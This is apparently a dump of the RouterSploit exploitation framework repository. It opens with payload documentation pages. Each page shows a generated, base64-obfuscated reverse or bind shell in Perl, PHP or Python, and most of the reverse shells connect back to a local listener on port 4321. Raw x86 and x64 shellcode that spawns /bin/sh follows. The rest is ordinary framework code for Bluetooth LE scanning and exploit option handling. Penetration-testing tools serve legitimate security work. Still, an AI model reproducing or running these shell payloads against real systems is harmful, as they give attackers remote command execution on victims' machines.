(Perl Reverse TCP) > run [*] Running module... [*] Generating payload use MIME::Base64;eval(decode_base64('dXNlIElPO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKFBlZXJBZGRyLCIxOTIuMTY4LjEuMzo0MzIxIik7U1RESU4tPmZkb3BlbigkYyxyKTskfi0+ZmRvcGVuKCRjLHcpO3doaWxlKDw+KXtpZigkXz1+IC8oLiopLyl7c3lzdGVtICQxO319Ow==')) ``` ================================================ FILE: docs/modules/payloads/php/bind_tcp.md ================================================ ## Description Module generates payload that creates interactive tcp bind shell by using php. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/php/bind_tcp` 3. Do: `set rport 4321` 4. Do: `run` 5. Module generates php tcp bind shell payload ## Scenarios ``` rsf > use payloads/php/bind_tcp rsf (PHP Bind TCP) > set rport 4321 [+] rport => 4321 rsf (PHP Bind TCP) > run [*] Running module... 
[*] Generating payload eval(base64_decode('JHM9c29ja2V0X2NyZWF0ZShBRl9JTkVULFNPQ0tfU1RSRUFNLFNPTF9UQ1ApO3NvY2tldF9iaW5kKCRzLCIwLjAuMC4wIiw0MzIxKTtzb2NrZXRfbGlzdGVuKCRzLDEpOyRjbD1zb2NrZXRfYWNjZXB0KCRzKTt3aGlsZSgxKXtpZighc29ja2V0X3dyaXRlKCRjbCwiJCAiLDIpKWV4aXQ7JGluPXNvY2tldF9yZWFkKCRjbCwxMDApOyRjbWQ9cG9wZW4oIiRpbiIsInIiKTt3aGlsZSghZmVvZigkY21kKSl7JG09ZmdldGMoJGNtZCk7c29ja2V0X3dyaXRlKCRjbCwkbSxzdHJsZW4oJG0pKTt9fQ==')); ``` ================================================ FILE: docs/modules/payloads/php/reverse_tcp.md ================================================ ## Description Module generates payload that creates interactive tcp reverse shell by using php. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/php/reverse_udp` 3. Do: `set lhost 192.168.1.4` 3. Do: `set lport 4321` 4. Do: `run` 5. Module generates php tcp reverse shell payload ## Scenarios ``` rsf > use payloads/php/reverse_tcp rsf (PHP Reverse TCP) > set lhost 192.168.1.4 [+] lhost => 192.168.1.4 rsf (PHP Reverse TCP) > set lport 4321 [+] lport => 4321 rsf (PHP Reverse TCP) > run [*] Running module... [*] Generating payload eval(base64_decode('JHM9ZnNvY2tvcGVuKCJ0Y3A6Ly8xOTIuMTY4LjEuNCIsNDMyMSk7d2hpbGUoIWZlb2YoJHMpKXtleGVjKGZnZXRzKCRzKSwkbyk7JG89aW1wbG9kZSgiXG4iLCRvKTskby49IlxuIjtmcHV0cygkcywkbyk7fQ==')); ``` ================================================ FILE: docs/modules/payloads/python/bind_tcp.md ================================================ ## Description Module generates payload that creates interactive tcp bind shell by using python. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/python/bind_tcp` 3. Do: `set rport 4321` 4. Do: `run` 5. Module generates python tcp bind shell payload ## Scenarios ``` rsf > use payloads/python/bind_tcp rsf (Python Bind TCP) > set rport 4321 [+] rport => 4321 rsf (Python Bind TCP) > run [*] Running module... 
[*] Generating payload exec('aW1wb3J0IHNvY2tldCxvcwpzbz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkKc28uYmluZCgoJzAuMC4wLjAnLDQzMjEpKQpzby5saXN0ZW4oMSkKc28sYWRkcj1zby5hY2NlcHQoKQp4PUZhbHNlCndoaWxlIG5vdCB4OgoJZGF0YT1zby5yZWN2KDEwMjQpCglzdGRpbixzdGRvdXQsc3RkZXJyLD1vcy5wb3BlbjMoZGF0YSkKCXN0ZG91dF92YWx1ZT1zdGRvdXQucmVhZCgpK3N0ZGVyci5yZWFkKCkKCXNvLnNlbmQoc3Rkb3V0X3ZhbHVlKQo='.decode('base64')) ``` ================================================ FILE: docs/modules/payloads/python/bind_udp.md ================================================ ## Description Module generates payload that creates interactive udp bind shell by using python. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/python/bind_udp` 3. Do: `set rport 4321` 4. Do: `run` 5. Module generates python udp bind shell payload ## Scenarios ``` rsf > use payloads/python/bind_udp rsf (Python Bind UDP) > set rport 4321 [+] rport => 4321 rsf (Python Bind UDP) > run [*] Running module... [*] Generating payload exec('ZnJvbSBzdWJwcm9jZXNzIGltcG9ydCBQb3BlbixQSVBFCmZyb20gc29ja2V0IGltcG9ydCBzb2NrZXQsIEFGX0lORVQsIFNPQ0tfREdSQU0Kcz1zb2NrZXQoQUZfSU5FVCxTT0NLX0RHUkFNKQpzLmJpbmQoKCcwLjAuMC4wJyw0MzIxKSkKd2hpbGUgMToKCWRhdGEsYWRkcj1zLnJlY3Zmcm9tKDEwMjQpCglvdXQ9UG9wZW4oZGF0YSxzaGVsbD1UcnVlLHN0ZG91dD1QSVBFLHN0ZGVycj1QSVBFKS5jb21tdW5pY2F0ZSgpCglzLnNlbmR0bygnJy5qb2luKFtvdXRbMF0sb3V0WzFdXSksYWRkcikK'.decode('base64')) ``` ================================================ FILE: docs/modules/payloads/python/reverse_tcp.md ================================================ ## Description Module generates payload that creates interactive tcp reverse shell by using python. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/python/reverse_tcp` 3. Do: `set lhost 192.168.1.4` 3. Do: `set lport 4321` 4. Do: `run` 5. 
Module generates python tcp reverse shell payload ## Scenarios ``` rsf > use payloads/python/reverse_tcp rsf (Python Reverse TCP) > set lhost 192.168.1.4 [+] lhost => 192.168.1.4 rsf (Python Reverse TCP) > set lport 4321 [+] lport => 4321 rsf (Python Reverse TCP) > run [*] Running module... [*] Generating payload exec('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zCnM9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pCnMuY29ubmVjdCgoJzE5Mi4xNjguMS40Jyw0MzIxKSkKb3MuZHVwMihzLmZpbGVubygpLDApCm9zLmR1cDIocy5maWxlbm8oKSwxKQpvcy5kdXAyKHMuZmlsZW5vKCksMikKcD1zdWJwcm9jZXNzLmNhbGwoWyIvYmluL3NoIiwiLWkiXSk='.decode('base64')) ``` ================================================ FILE: docs/modules/payloads/python/reverse_udp.md ================================================ ## Description Module generates payload that creates interactive udp reverse shell by using python. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/python/reverse_udp` 3. Do: `set lhost 192.168.1.4` 3. Do: `set lport 4321` 4. Do: `run` 5. Module generates python udp reverse shell payload ## Scenarios ``` rsf > use payloads/python/reverse_udp rsf (Python Reverse UDP) > set lhost 192.168.1.4 [+] lhost => 192.168.1.4 rsf (Python Reverse UDP) > set lport 4321 [+] lport => 4321 rsf (Python Reverse UDP) > run [*] Running module... [*] Generating payload exec('aW1wb3J0IG9zCmltcG9ydCBwdHkKaW1wb3J0IHNvY2tldApzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsIHNvY2tldC5TT0NLX0RHUkFNKQpzLmNvbm5lY3QoKCcxOTIuMTY4LjEuNCcsNDMyMSkpCm9zLmR1cDIocy5maWxlbm8oKSwgMCkKb3MuZHVwMihzLmZpbGVubygpLCAxKQpvcy5kdXAyKHMuZmlsZW5vKCksIDIpCnB0eS5zcGF3bignL2Jpbi9zaCcpOwpzLmNsb3NlKCkK'.decode('base64')) ``` ================================================ FILE: docs/modules/payloads/x64/bind_tcp.md ================================================ ## Description Module generates payload that creates interactive tcp bind shell for X64 architecture. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/x64/bind_tcp` 3. 
Do: `set rport 4321` 4. Do: `run` 5. Module generates x64 bind shell tcp payload ## Scenarios ``` rsf > use payloads/x64/bind_tcp rsf (X64 Bind TCP) > set rport 4321 [+] rport => 4321 rsf (X64 Bind TCP) > run [*] Running module... [*] Generating payload [+] Building payload for python payload = ( "\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x52" "\xc7\x04\x24\x02\x00\x10\xe1\x48\x89\xe6\x6a\x10\x5a\x6a\x31" "\x58\x0f\x05\x6a\x32\x58\x0f\x05\x48\x31\xf6\x6a\x2b\x58\x0f" "\x05\x48\x97\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75" "\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00" "\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05" ) ``` ================================================ FILE: docs/modules/payloads/x64/reverse_tcp.md ================================================ ## Description Module generates payload that creates interactive tcp reverse shell for X64 architecture. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/x64/reverse_tcp` 3. Do: `set lhost 192.168.1.4` 4. Do: `set lport 4321` 5. Module generates x64 reverse shell tcp payload ## Scenarios ``` rsf > use payloads/x64/reverse_tcp rsf (X64 Reverse TCP) > set lhost 192.168.1.4 [+] lhost => 192.168.1.4 rsf (X64 Reverse TCP) > set lport 4321 [+] lport => 4321 rsf (X64 Reverse TCP) > run [*] Running module... [*] Generating payload [+] Building payload for python payload = ( "\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x48" "\xb9\x02\x00\x10\xe1\xc0\xa8\x01\x04\x51\x48\x89\xe6\x6a\x10" "\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58" "\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f" "\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05" ) ``` ================================================ FILE: docs/modules/payloads/x86/bind_tcp.md ================================================ ## Description Module generates payload that creates interactive tcp bind shell for X86 architecture. ## Verification Steps 1. 
Start `./rsf.py` 2. Do: `use payloads/x86/bind_tcp` 3. Do: `set rport 4321` 4. Do: `run` 5. Module generates x86 bind shell tcp payload ## Scenarios ``` rsf > use payloads/x86/bind_tcp rsf (X86 Bind TCP) > set rport 4321 [+] rport => 4321 rsf (X86 Bind TCP) > run [*] Running module... [*] Generating payload [+] Building payload for python payload = ( "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80" "\x5b\x5e\x52\x68\x02\x00\x10\xe1\x6a\x10\x51\x50\x89\xe1\x6a" "\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0" "\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f" "\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0" "\x0b\xcd\x80" ) ``` ================================================ FILE: docs/modules/payloads/x86/reverse_tcp.md ================================================ ## Description Module generates payload that creates interactive tcp reverse shell for X86 architecture. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/x86/reverse_tcp` 3. Do: `set lhost 192.168.1.4` 4. Do: `set lport 4321` 5. Module generates x86 reverse shell tcp payload ## Scenarios ``` rsf > use payloads/x86/reverse_tcp rsf (X86 Reverse TCP) > set lhost 192.168.1.4 [+] lhost => 192.168.1.4 rsf (X86 Reverse TCP) > set lport 4321 [+] lport => 4321 rsf (X86 Reverse TCP) > run [*] Running module... 
[*] Generating payload [+] Building payload for python payload = ( "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80" "\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\xc0\xa8\x01\x04\x68" "\x02\x00\x10\xe1\x89\xe1\xb0\x66\x50\x51\x53\xb3\x03\x89\xe1" "\xcd\x80\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3" "\x52\x53\x89\xe1\xb0\x0b\xcd\x80" ) ``` ================================================ FILE: requirements-dev.txt ================================================ requests==2.32.2 paramiko pysnmp==4.4.6 pycryptodome pytest==4.4.0 pytest-forked pytest-xdist flake8 git+git://github.com/threat9/threat9-test-bed telnetlib3 ================================================ FILE: requirements.txt ================================================ requests==2.32.2 paramiko pysnmp pycryptodome ================================================ FILE: routersploit/__init__.py ================================================ ================================================ FILE: routersploit/core/__init__.py ================================================ ================================================ FILE: routersploit/core/bluetooth/__init__.py ================================================ ================================================ FILE: routersploit/core/bluetooth/btle/__init__.py ================================================ from .btle_device import ( Device ) from .btle_scanner import ( BTLEScanner, ScanDelegate ) __all__ = [ "Device", "BTLEScanner", "ScanDelegate", ] ================================================ FILE: routersploit/core/bluetooth/btle/btle_device.py ================================================ import struct from bluepy.btle import ( Peripheral, ScanEntry, AssignedNumbers ) from routersploit.core.exploit.printer import ( print_table, print_success, print_status, print_error, color_blue, color_green, color_red ) from routersploit.core.exploit.utils import ( lookup_vendor ) class Device(ScanEntry): """ Single discovered 
Bluetooth Low Energy device """ def __init__(self, addr, iface): ScanEntry.__init__(self, addr, iface) self.vendor = None self.data = [] def _update(self, resp): ScanEntry._update(self, resp) if self.addrType == "random": self.vendor = "None (Random MAC address)" else: self.vendor = lookup_vendor(self.addr) if self.scanData: self.data = self._get_data(self.getScanData()) def print_info(self): headers = (color_blue("{} ({} dBm)").format(self.addr, self.rssi), "") if self.connectable: allow_connection = color_green(str(self.connectable)) else: allow_connection = color_red(str(self.connectable)) data = [ ("Vendor", self.vendor), ("Allow Connections", allow_connection), ] for d in self.data: data.append((d[0], d[1])) print_table(headers, *data, max_column_length=70, extra_fill=3) def print_services(self): headers = ("Handles", "Service > Characteristics", "Properties", "Data") services = self.enumerate_services() if services: print_table(headers, *services, max_column_length=70, extra_fill=3) def enumerate_services(self): print_status("Starting enumerating {} ({} dBm) ...".format(self.addr, self.rssi)) try: dev = Peripheral(self, self.addrType) services = sorted(dev.services, key=lambda s: s.hndStart) data = [] for service in services: if service.hndStart == service.hndEnd: continue data.append([ "{:04x} -> {:04x}".format(service.hndStart, service.hndEnd), self._get_svc_description(service), "", "", ]) for _, char in enumerate(service.getCharacteristics()): desc = self._get_char_description(char) props = char.propertiesToString() hnd = char.getHandle() value = self._get_char(char, props) data.append([ "{:04x}".format(hnd), desc, props, value ]) dev.disconnect() return data except Exception as err: print_error(err) try: dev.disconnect() except Exception as err: print_error(err) return None def write(self, characteristic, data): try: dev = Peripheral(self, self.addrType) services = sorted(dev.services, key=lambda s: s.hndStart) print_status("Searching for characteristic 
{}".format(characteristic)) char = None for service in services: if char is not None: break for _, c in enumerate(service.getCharacteristics()): if str(c.uuid) == characteristic: char = c break if char: if "WRITE" in char.propertiesToString(): print_success("Sending {} bytes...".format(len(data))) wwrflag = False if "NO RESPONSE" in char.propertiesToString(): wwrflag = True try: char.write(data, wwrflag) print_success("Data sent") except Exception as err: print_error("Error: {}".format(err)) else: print_error("Not writable") dev.disconnect() except Exception as err: print_error(err) try: dev.disconnect() except Exception: pass return None def _get_data(self, scan_data): data = [] for (tag, desc, val) in scan_data: if desc == "Flags": data.append(("Flags", self._get_flags(val))) elif tag in [8, 9]: try: data.append((desc, val)) except UnicodeEncodeError: data.append((desc, repr(val))) else: data.append((desc, val)) return data def _get_flags(self, data): bits = [] flags = int(data, 16) if self._is_bit_set(flags, 0): bits.append("LE Limited Discoverable") if self._is_bit_set(flags, 1): bits.append("LE General Discoverable") if self._is_bit_set(flags, 2): bits.append("BR/EDR") if self._is_bit_set(flags, 3): bits.append("LE + BR/EDR Controller Mode") if self._is_bit_set(flags, 4): bits.append("LE + BR/EDR Host Mode") return ", ".join(bits) def _is_bit_set(self, byteval, idx): return ((byteval & (1 << idx)) != 0) def _get_svc_description(self, service): uuid_name = service.uuid.getCommonName() if uuid_name and uuid_name != str(service.uuid): return "{} ({})".format(color_green(uuid_name), service.uuid) return str(service.uuid) def _get_char_description(self, char): char_name = char.uuid.getCommonName() if char_name and char_name != str(char.uuid): return " {} ({})".format(color_green(char_name), char.uuid) return " {}".format(char.uuid) def _get_char(self, char, props): string = "" if "READ" in props and "INDICATE" not in props: try: data = char.read() if char.uuid == 
AssignedNumbers.appearance: string = self._get_appearance(data) else: try: string = color_blue(repr(data.decode("utf-8"))) except Exception: string = repr(data) except Exception: pass return string def _get_appearance(self, data): appearance = { 0: "Unknown", 64: "Generic Phone", 128: "Generic Computer", 192: "Generic Watch", 193: "Watch: Sports Watch", 256: "Generic Clock", 320: "Generic Display", 384: "Generic Remote Control", 448: "Generic Eye-glasses", 512: "Generic Tag", 576: "Generic Keyring", 640: "Generic Media Player", 704: "Generic Barcode Scanner", 768: "Generic Thermometer", 769: "Thermometer: Ear", 832: "Generic Heart rate Sensor", 833: "Heart Rate Sensor: Heart Rate Belt", 896: "Generic Blood Pressure", 897: "Blood Pressure: Arm", 898: "Blood Pressure: Wrist", 960: "Human Interface Device (HID)", 961: "Keyboard", 962: "Mouse", 963: "Joystick", 964: "Gamepad", 965: "Digitizer Tablet", 966: "Card Reader", 967: "Digital Pen", 968: "Barcode Scanner", 1024: "Generic Glucose Meter", 1088: "Generic: Running Walking Sensor", 1089: "Running Walking Sensor: In-Shoe", 1090: "Running Walking Sensor: On-Shoe", 1091: "Running Walking Sensor: On-Hip", 1152: "Generic: Cycling", 1153: "Cycling: Cycling Computer", 1154: "Cycling: Speed Sensor", 1155: "Cycling: Cadence Sensor", 1156: "Cycling: Power Sensor", 1157: "Cycling: Speed and Cadence Sensor", 1216: "Generic Control Device", 1217: "Switch", 1218: "Multi-switch", 1219: "Button", 1220: "Slider", 1221: "Rotary", 1222: "Touch-panel", 1280: "Generic Network Device", 1281: "Access Point", 1344: "Generic Sensor", 1345: "Motion Sensor", 1346: "Air Quality Sensor", 1347: "Temperature Sensor", 1348: "Humidity Sensor", 1349: "Leak Sensor", 1350: "Smoke Sensor", 1351: "Occupancy Sensor", 1352: "Contact Sensor", 1353: "Carbon Monoxide Sensor", 1354: "Carbon Dioxide Sensor", 1355: "Ambient Light Sensor", 1356: "Energy Sensor", 1357: "Color Light Sensor", 1358: "Rain Sensor", 1359: "Fire Sensor", 1360: "Wind Sensor", 1361: 
"Proximity Sensor", 1362: "Multi-Sensor", 1408: "Generic Light Fixtures", 1409: "Wall Light", 1410: "Ceiling Light", 1411: "Floor Light", 1412: "Cabinet Light", 1413: "Desk Light", 1414: "Troffer Light", 1415: "Pendant Light", 1416: "In-ground Light", 1417: "Flood Light", 1418: "Underwater Light", 1419: "Bollard with Light", 1420: "Pathway Light", 1421: "Garden Light", 1422: "Pole-top Light", 1423: "Spotlight", 1424: "Linear Light", 1425: "Street Light", 1426: "Shelves Light", 1427: "High-bay / Low-bay Light", 1428: "Emergency Exit Light", 1472: "Generic Fan", 1473: "Ceiling Fan", 1474: "Axial Fan", 1475: "Exhaust Fan", 1476: "Pedestal Fan", 1477: "Desk Fan", 1478: "Wall Fan", 1536: "Generic HVAC", 1537: "Thermostat", 1600: "Generic Air Conditioning", 1664: "Generic Humidifier", 1728: "Generic Heating", 1729: "Radiator", 1730: "Boiler", 1731: "Heat Pump", 1732: "Infrared Heater", 1733: "Radiant Panel Heater", 1734: "Fan Heater", 1735: "Air Curtain", 1792: "Generic Access Control", 1793: "Access Door", 1794: "Garage Door", 1795: "Emergency Exit Door", 1796: "Access Lock", 1797: "Elevator", 1798: "Window", 1799: "Entrance Gate", 1856: "Generic Motorized Device", 1857: "Motorized Gate", 1858: "Awning", 1859: "Blinds or Shades", 1860: "Curtains", 1861: "Screen", 1920: "Generic Power Device", 1921: "Power Outlet", 1922: "Power Strip", 1923: "Plug", 1924: "Power Supply", 1925: "LED Driver", 1926: "Fluorescent Lamp Gear", 1927: "HID Lamp Gear", 1984: "Generic Light Source", 1985: "Incandescent Light Bulb", 1986: "LED Bulb", 1987: "HID Lamp", 1988: "Fluorescent Lamp", 1989: "LED Array", 1990: "Multi-Color LED Array", 3136: "Generic: Pulse Oximeter", 3137: "Fingertip", 3138: "Wrist Worn", 3200: "Generic: Weight Scale", 3264: "Generic", 3265: "Powered Wheelchair", 3266: "Mobility Scooter", 3328: "Generic", 5184: "Generic: Outdoor Sports Activity", 5185: "Location Display Device", 5186: "Location and Navigation Display Device", 5187: "Location Pod", 5188: "Location and 
Navigation Pod",
        }

        try:
            # No byte-order prefix: "h" reads one signed 16-bit value in the
            # host's native byte order. Input that is not exactly two bytes
            # raises and ends up in the repr() fallback below.
            code = struct.unpack("h", data)[0]
            if code in appearance.keys():
                return color_green(appearance[code])
        except Exception:
            pass

        return repr(data)


================================================
FILE: routersploit/core/bluetooth/btle/btle_scanner.py
================================================
import time
import binascii
from bluepy.btle import Scanner, DefaultDelegate
from .btle_device import Device


class BTLEScanner(Scanner):
    """ Bluetooth Low Energy Scanner

    Scanner subclass with an optional target address: when ``mac`` is set,
    scan responses from other addresses are ignored and processing stops
    once a response from the target has been handled.
    """

    def __init__(self, mac=None, iface=0):
        """ Create a scanner on interface ``iface``, optionally limited to ``mac`` """
        Scanner.__init__(self, iface)
        self.mac = mac

    def _decode_address(self, resp):
        """ Return the address carried in ``resp`` as colon-separated hex octets """
        addr = binascii.b2a_hex(resp["addr"][0]).decode("utf-8")
        # only the first 12 hex digits (six octets) are used
        return ":".join([addr[i: i + 2] for i in range(0, 12, 2)])

    def _find_or_create(self, addr):
        """ Return the Device cached for ``addr``, creating and caching it if absent """
        if addr in self.scanned:
            dev = self.scanned[addr]
        else:
            dev = Device(addr, self.iface)
            self.scanned[addr] = dev

        return dev

    def process(self, timeout=10.0):
        """ Handle scan responses until the deadline passes, no response arrives or the target is seen

        :param float timeout: seconds to keep processing; a falsy value passes
                              ``None`` as the wait time to ``_waitResp``
        """
        start = time.time()

        while True:
            if timeout:
                remain = start + timeout - time.time()
                if remain <= 0.0:
                    break
            else:
                remain = None

            resp = self._waitResp(["scan", "stat"], remain)
            if resp is None:
                break

            respType = resp["rsp"][0]

            if respType == "stat":
                # a "disc" state report is answered with a new "scan" command
                if resp["state"][0] == "disc":
                    self._mgmtCmd("scan")

            elif respType == "scan":
                addr = self._decode_address(resp)

                # with a target MAC configured, responses from other devices are dropped
                if not self.mac or addr == self.mac:
                    dev = self._find_or_create(addr)

                    newData = dev._update(resp)
                    if self.delegate:
                        # second argument is True only for the first update of this device
                        self.delegate.handleDiscovery(dev, (dev.updateCount <= 1), newData)

                    if self.mac and dev.addr == self.mac:
                        break


class ScanDelegate(DefaultDelegate):
    """ Scan callback that prints newly discovered devices when buffering is enabled """

    def __init__(self, options):
        DefaultDelegate.__init__(self)
        self.options = options

    def handleDiscovery(self, dev, isNewDev, isNewData):
        """ Print ``dev`` on its first sighting, honouring the MAC filter and buffering flag """
        if not isNewDev:
            return
        elif self.options.mac and dev.addr != self.options.mac:
            return

        if self.options.buffering:
            # NOTE(review): print_info() renders fields taken from the scan
            # data, which the remote device controls - treat the printed
            # output as untrusted when it is logged or parsed.
            dev.print_info()


================================================
FILE: routersploit/core/bluetooth/btle_client.py
================================================
from routersploit.core.exploit.exploit import Exploit
from routersploit.core.exploit.option import OptInteger
from routersploit.core.exploit.printer import (
    print_error,
    print_status
)
from routersploit.core.bluetooth.btle import (
    ScanDelegate,
    BTLEScanner
)


class Options:
    """ Options used by the scanner """

    def __init__(self, buffering, mac, enum_services):
        self.buffering = buffering
        self.mac = mac
        self.enum_services = enum_services


class BTLEClient(Exploit):
    """ Bluetooth Low Energy Client implementation """

    scan_time = OptInteger(10, "Number of seconds to scan for")
    buffering = False
    enum_services = False

    def btle_scan(self, mac=None):
        """ Scans for Bluetooth Low Energy devices

        :param mac: optional address; when given it is handed to the scanner
                    and to the delegate as a filter
        :return: list built from ``scanner.scan(self.scan_time)``, or an empty
                 list when the scan raises (the error is printed, not propagated)
        """

        options = Options(
            self.buffering,
            mac,
            self.enum_services
        )

        scanner = BTLEScanner(options.mac).withDelegate(ScanDelegate(options))

        if options.mac:
            print_status("Scanning BTLE device...")
        else:
            print_status("Scanning for BTLE devices...")

        devices = []
        try:
            devices = [res for res in scanner.scan(self.scan_time)]
        except Exception as err:
            print_error("Error: {}".format(err))
            print_error("Check if your bluetooth hardware is connected")

        return devices


================================================
FILE: routersploit/core/exploit/__init__.py
================================================
from routersploit.core.exploit.exploit import (
    Exploit,
    multi,
    mute,
    LockedIterator,
)

from routersploit.core.exploit.option import (
    OptIP,
    OptPort,
    OptInteger,
    OptFloat,
    OptBool,
    OptString,
    OptMAC,
    OptWordlist,
)

from routersploit.core.exploit.printer import (
    print_info,
    print_status,
    print_success,
    print_error,
    print_table,
)

from routersploit.core.exploit import utils
from routersploit.core.exploit.shell import shell

# names re-exported as the package's public API
__all__ = [
    "Exploit",
    "multi",
    "mute",
    "LockedIterator",

    "OptIP",
    "OptPort",
    "OptInteger",
    "OptFloat",
    "OptBool",
    "OptString",
    "OptMAC",
    "OptWordlist",

    "print_info",
    "print_status",
    "print_success",
    "print_error",
    "print_table",

    "utils",

    "shell",
]


================================================
FILE:
routersploit/core/exploit/encoders.py
================================================
from routersploit.core.exploit.exploit import BaseExploit
from routersploit.core.exploit.printer import print_error


class BaseEncoder(BaseExploit):
    """ Base class for encoder modules; subclasses provide ``encode()`` """

    architecture = None

    def __init__(self):
        # module path with the encoders package prefix removed and "/" separators
        self.module_name = self.__module__.replace("routersploit.modules.encoders.", "").replace(".", "/")

    def encode(self):
        raise NotImplementedError("Please implement 'encode()' method")

    def run(self):
        # encoders are not runnable on their own; only an error is printed
        print_error("Module cannot be run")

    def __str__(self):
        return self.module_name

    def __format__(self, form):
        return format(self.module_name, form)


================================================
FILE: routersploit/core/exploit/exceptions.py
================================================
class RoutersploitException(Exception):
    """ Root of the exception types defined in this file """

    def __init__(self, msg: str = ""):
        super(RoutersploitException, self).__init__(msg)


class OptionValidationError(RoutersploitException):
    """ Raised by option descriptors when a value fails validation """
    pass


class StopThreadPoolExecutor(RoutersploitException):
    pass


================================================
FILE: routersploit/core/exploit/exploit.py
================================================
import os
import threading
import time
from itertools import chain
from functools import wraps

from routersploit.core.exploit.printer import (
    print_status,
    thread_output_stream,
)
from routersploit.core.exploit.option import Option

GLOBAL_OPTS = {}


class Protocol:
    """ String identifiers for the protocol a module targets """

    CUSTOM = "custom"
    TCP = "custom/tcp"
    UDP = "custom/udp"
    FTP = "ftp"
    FTPS = "ftps"
    SSH = "ssh"
    TELNET = "telnet"
    HTTP = "http"
    HTTPS = "https"
    SNMP = "snmp"


class ExploitOptionsAggregator(type):
    """ Metaclass for exploit base class.

    Metaclass is aggregating all possible Attributes that user can set
    for tab completion purposes.
    """

    def __new__(cls, name, bases, attrs):
        # Start from the options inherited from the bases. If any base has no
        # exploit_attributes, the AttributeError branch starts from an empty
        # mapping instead of merging what the other bases provide.
        try:
            base_exploit_attributes = chain([base.exploit_attributes for base in bases])
        except AttributeError:
            attrs["exploit_attributes"] = {}
        else:
            attrs["exploit_attributes"] = {k: v for d in base_exploit_attributes for k, v in d.items()}

        # iterate over a copy because attrs is modified inside the loop
        for key, value in attrs.copy().items():
            if isinstance(value, Option):
                value.label = key
                attrs["exploit_attributes"].update({key: [value.display_value, value.description, value.advanced]})
            elif key == "__info__":
                # stored under "_<class name>__info__" instead of "__info__"
                attrs["_{}{}".format(name, key)] = value
                del attrs[key]
            elif key in attrs["exploit_attributes"]:  # removing exploit_attribute that was overwritten
                del attrs["exploit_attributes"][key]  # in the child and is not an Option() instance

        return super(ExploitOptionsAggregator, cls).__new__(cls, name, bases, attrs)


class BaseExploit(metaclass=ExploitOptionsAggregator):

    @property
    def options(self):
        """ Returns list of options that user can set.

        Returns list of options aggregated by
        ExploitOptionsAggregator metaclass that user can set.
:return: list of options that user can set """ return list(self.exploit_attributes.keys()) def __str__(self): return self.__module__.split('.', 2).pop().replace('.', os.sep) class Exploit(BaseExploit): """ Base class for exploits """ target_protocol = Protocol.CUSTOM def run(self): raise NotImplementedError("You have to define your own 'run' method.") def check(self): raise NotImplementedError("You have to define your own 'check' method.") def run_threads(self, threads_number: int, target_function: any, *args, **kwargs) -> None: """ Run function across specified number of threads :param int thread_number: number of threads that should be executed :param func target_function: function that should be executed accross specified number of threads :param any args: args passed to target_function :param any kwargs: kwargs passed to target function :return None """ threads = [] threads_running = threading.Event() threads_running.set() for thread_id in range(int(threads_number)): thread = threading.Thread( target=target_function, args=chain((threads_running,), args), kwargs=kwargs, name=f"thread-{thread_id}", ) threads.append(thread) # print_status("{} thread is starting...".format(thread.name)) thread.start() start = time.time() try: while thread.is_alive(): thread.join(1) except KeyboardInterrupt: threads_running.clear() for thread in threads: thread.join() # print_status("{} thread is terminated.".format(thread.name)) print_status("Elapsed time: {0:.4f} seconds".format(round(time.time() - start, 2))) def multi(fn): """ Decorator for exploit.Exploit class Decorator that allows to feed exploit using text file containing multiple targets definition. Decorated function will be executed as many times as there is targets in the feed file. WARNING: Important thing to remember is fact that decorator will supress values returned by decorated function. Since method that perform attack is not supposed to return anything this is not a problem. 
""" @wraps(fn) def wrapper(self, *args, **kwargs): if self.target.startswith("file://"): original_target = self.target original_port = self.port _, _, feed_path = self.target.partition("file://") try: with open(feed_path) as file_handler: for target in file_handler: target = target.strip() if not target: continue self.target, _, port = target.partition(":") if port: self.port = port else: self.port = original_port fn(self, *args, **kwargs) self.target = original_target self.port = original_port return # Nothing to return, ran multiple times except IOError: return else: return fn(self, *args, **kwargs) return wrapper class DummyFile(object): """ Mocking file object. Optimilization for the "mute" decorator. """ def write(self, x): pass def mute(fn): """ Suppress function from printing to sys.stdout """ @wraps(fn) def wrapper(self, *args, **kwargs): thread_output_stream.setdefault(threading.current_thread(), []).append(DummyFile()) try: return fn(self, *args, **kwargs) finally: thread_output_stream[threading.current_thread()].pop() return wrapper class 